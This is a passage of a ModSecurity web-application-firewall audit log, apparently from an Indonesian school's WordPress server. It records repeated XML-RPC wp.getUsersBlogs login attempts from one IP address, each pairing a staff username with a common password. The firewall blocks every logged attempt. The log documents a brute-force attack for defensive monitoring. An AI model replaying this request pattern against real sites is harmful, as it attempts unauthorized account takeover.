X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--22ae3d7b-C--
wp.getUsersBlogs
wakahumas
4444
--22ae3d7b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--22ae3d7b-E--
--22ae3d7b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (19+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072642197079 3997 (- - -)
Stopwatch2: 1745072642197079 3997; combined=2699, p1=358, p2=2174, p3=0, p4=0, p5=100, sr=79, sw=67, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--22ae3d7b-Z--
--3623c753-A--
[19/Apr/2025:21:25:02 +0700] aAOyPkruoUXZj665VUEEngAAANc 103.236.140.4 52176 103.236.140.4 8181
--3623c753-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 219
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--3623c753-C--
wp.getUsersBlogs
wakahumas
2003
--3623c753-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3623c753-E--
--3623c753-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072702289801 6027 (- - -)
Stopwatch2: 1745072702289801 6027; combined=4123, p1=615, p2=3328, p3=0, p4=0, p5=106, sr=96, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3623c753-Z--
--ac967a70-A--
[19/Apr/2025:21:26:04 +0700] aAOyfEruoUXZj665VUEGFgAAAMQ 103.236.140.4 58600 103.236.140.4 8181
--ac967a70-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--ac967a70-C--
wp.getUsersBlogs
wakahumas
123ewq
--ac967a70-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ac967a70-E--
--ac967a70-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (16+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072764548935 4797 (- - -)
Stopwatch2: 1745072764548935 4797; combined=3407, p1=430, p2=2817, p3=0, p4=0, p5=94, sr=85, sw=66, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ac967a70-Z--
--13fe9d01-A--
[19/Apr/2025:21:27:08 +0700] aAOyvOvDiFC_ir7MDwb0PgAAAFY 103.236.140.4 36888 103.236.140.4 8181
--13fe9d01-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--13fe9d01-C--
wp.getUsersBlogs
wakahumas
power123445
--13fe9d01-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--13fe9d01-E--
--13fe9d01-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (23+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072828928792 5155 (- - -)
Stopwatch2: 1745072828928792 5155; combined=3863, p1=476, p2=3212, p3=0, p4=0, p5=102, sr=88, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--13fe9d01-Z--
--1dd66152-A--
[19/Apr/2025:21:28:09 +0700] aAOy-UruoUXZj665VUEJuAAAANE 103.236.140.4 43040 103.236.140.4 8181
--1dd66152-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 220
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--1dd66152-C--
wp.getUsersBlogs
wakahumas
zxcvb
--1dd66152-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1dd66152-E--
--1dd66152-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (31+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072889377846 5255 (- - -)
Stopwatch2: 1745072889377846 5255; combined=3829, p1=512, p2=3140, p3=0, p4=0, p5=104, sr=93, sw=73, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1dd66152-Z--
--8d34a419-A--
[19/Apr/2025:21:29:12 +0700] aAOzOA6cTFSgLAHl7Prs3AAAABg 103.236.140.4 49490 103.236.140.4 8181
--8d34a419-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8d34a419-C--
wp.getUsersBlogs
wakahumas
rockyou
--8d34a419-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8d34a419-E--
--8d34a419-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (26+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745072952663963 5551 (- - -)
Stopwatch2: 1745072952663963 5551; combined=4102, p1=530, p2=3388, p3=0, p4=0, p5=110, sr=102, sw=74, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8d34a419-Z--
--39fa4e1a-A--
[19/Apr/2025:21:30:03 +0700] aAOza-vDiFC_ir7MDwb4UgAAAEU 103.236.140.4 54498 103.236.140.4 8181
--39fa4e1a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 223
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--39fa4e1a-C--
wp.getUsersBlogs
wakahumas
1234%^&*
--39fa4e1a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--39fa4e1a-E--
--39fa4e1a-H--
Message: XML parser error: XML: Failed parsing document.
Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073003440862 5508 (- - -)
Stopwatch2: 1745073003440862 5508; combined=4023, p1=414, p2=3343, p3=0, p4=0, p5=160, sr=70, sw=106, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--39fa4e1a-Z--
--4ead8b32-A--
[19/Apr/2025:21:30:20 +0700] aAOzfA6cTFSgLAHl7PruwAAAABY 103.236.140.4 56206 103.236.140.4 8181
--4ead8b32-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 224
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--4ead8b32-C--
wp.getUsersBlogs
wakahumas
123asdasd
--4ead8b32-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4ead8b32-E--
--4ead8b32-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (22+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073020183451 5068 (- - -)
Stopwatch2: 1745073020183451 5068; combined=3761, p1=451, p2=3102, p3=0, p4=0, p5=122, sr=94, sw=86, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4ead8b32-Z--
--a07d4b60-A--
[19/Apr/2025:21:31:20 +0700] aAOzuHNa4dA2HllpK_OQ4wAAAIk 103.236.140.4 34172 103.236.140.4 8181
--a07d4b60-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a07d4b60-C--
wp.getUsersBlogs
wakahumas
!@#123
--a07d4b60-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a07d4b60-E--
--a07d4b60-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (32+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073080445510 5552 (- - -)
Stopwatch2: 1745073080445510 5552; combined=4001, p1=484, p2=3346, p3=0, p4=0, p5=102, sr=91, sw=69, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a07d4b60-Z--
--76d89869-A--
[19/Apr/2025:21:32:22 +0700] aAOz9g6cTFSgLAHl7PrxzwAAABI 103.236.140.4 39910 103.236.140.4 8181
--76d89869-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--76d89869-C--
wp.getUsersBlogs
wakahumas
justin
--76d89869-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--76d89869-E--
--76d89869-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073142028248 4977 (- - -)
Stopwatch2: 1745073142028248 4977; combined=3826, p1=460, p2=3125, p3=0, p4=0, p5=138, sr=86, sw=103, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--76d89869-Z--
--161a9157-A--
[19/Apr/2025:21:33:25 +0700] aAO0NQ6cTFSgLAHl7PrzHgAAAAc 103.236.140.4 45958 103.236.140.4 8181
--161a9157-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--161a9157-C--
wp.getUsersBlogs
wakahumas
555555
--161a9157-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--161a9157-E--
--161a9157-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073205456829 5272 (- - -)
Stopwatch2: 1745073205456829 5272; combined=3724, p1=479, p2=3060, p3=0, p4=0, p5=107, sr=90, sw=78, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--161a9157-Z--
--fe0bd04e-A--
[19/Apr/2025:21:34:30 +0700] aAO0dkruoUXZj665VUEUKgAAAMk 103.236.140.4 52264 103.236.140.4 8181
--fe0bd04e-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 222
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--fe0bd04e-C--
wp.getUsersBlogs
wakahumas
qwerty1
--fe0bd04e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--fe0bd04e-E--
--fe0bd04e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (35+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073270021300 4765 (- - -)
Stopwatch2: 1745073270021300 4765; combined=3449, p1=404, p2=2837, p3=0, p4=0, p5=119, sr=78, sw=89, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--fe0bd04e-Z--
--6fe9434b-A--
[19/Apr/2025:21:35:35 +0700] aAO0t-vDiFC_ir7MDwb_kQAAAEg 103.236.140.4 58634 103.236.140.4 8181
--6fe9434b-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 221
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--6fe9434b-C--
wp.getUsersBlogs
wakahumas
333333
--6fe9434b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6fe9434b-E--
--6fe9434b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (24+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073335597046 6084 (- - -)
Stopwatch2: 1745073335597046 6084; combined=4269, p1=542, p2=3506, p3=0, p4=0, p5=129, sr=94, sw=92, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6fe9434b-Z--
--736e776c-A--
[19/Apr/2025:21:36:39 +0700] aAO09-vDiFC_ir7MDwYBagAAAFY 103.236.140.4 36596 103.236.140.4 8181
--736e776c-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 229
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--736e776c-C--
wp.getUsersBlogs
wakasarpras
wakasarpras1
--736e776c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--736e776c-E--
--736e776c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073399515843 4925 (- - -)
Stopwatch2: 1745073399515843 4925; combined=3592, p1=389, p2=3023, p3=0, p4=0, p5=103, sr=79, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--736e776c-Z--
--a36ad94a-A--
[19/Apr/2025:21:37:39 +0700] aAO1M-vDiFC_ir7MDwYCvAAAAEQ 103.236.140.4 41866 103.236.140.4 8181
--a36ad94a-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--a36ad94a-C--
wp.getUsersBlogs
wakasarpras
123123123
--a36ad94a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a36ad94a-E--
--a36ad94a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 182.43.73.90 (25+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745073459468989 5663 (- - -)
Stopwatch2: 1745073459468989 5663; combined=4345, p1=527, p2=3476, p3=0, p4=0, p5=185, sr=88, sw=157, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a36ad94a-Z--
--8b518647-A--
[19/Apr/2025:21:38:39 +0700] aAO1b3Na4dA2HllpK_OZugAAAIA 103.236.140.4 47978 103.236.140.4 8181
--8b518647-B--
POST /xmlrpc.php HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 182.43.73.90
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 182.43.73.90
X-Forwarded-Proto: http
Connection: close
Content-Length: 226
Content-Type: application/xml; charset=ISO-8859-1
User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161)
--8b518647-C--
wp.getUsersBlogs
wakasarpras
abc123456
--8b518647-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8b518647-E--
--8b518647-H--
